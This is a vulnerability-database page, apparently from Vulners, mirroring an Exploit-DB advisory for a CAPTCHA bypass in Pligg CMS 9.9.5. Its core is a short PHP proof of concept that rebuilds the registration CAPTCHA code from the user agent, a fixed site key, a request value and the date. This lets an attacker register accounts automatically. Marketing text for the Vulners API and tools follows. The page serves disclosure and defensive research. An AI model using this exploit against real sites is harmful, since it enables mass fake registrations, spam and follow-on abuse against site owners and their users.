Lucene search
K

Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass

🗓️ 02 Aug 2008 00:00:00Reported by Micheal BrooksType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 58 Views

Pligg CMS 9.9.5 Security Bypass allows Registration Automatio

Code
source: https://www.securityfocus.com/bid/30518/info

Pligg is prone to a security-bypass weakness.

Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.

Pligg 9.9.5 is vulnerable; other versions may also be affected.

<?php

$sitekey=82397834;

$ts_random=$_REQUEST[&#039;ts_random&#039;];

$datekey = date(�F j�);

$rcode = hexdec(md5($_SERVER[&#039;HTTP_USER_AGENT&#039;] . $sitekey . $ts_random . $datekey));

print substr($rcode, 2, 6);

?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Aug 2008 00:00Current
7High risk
Vulners AI Score7
58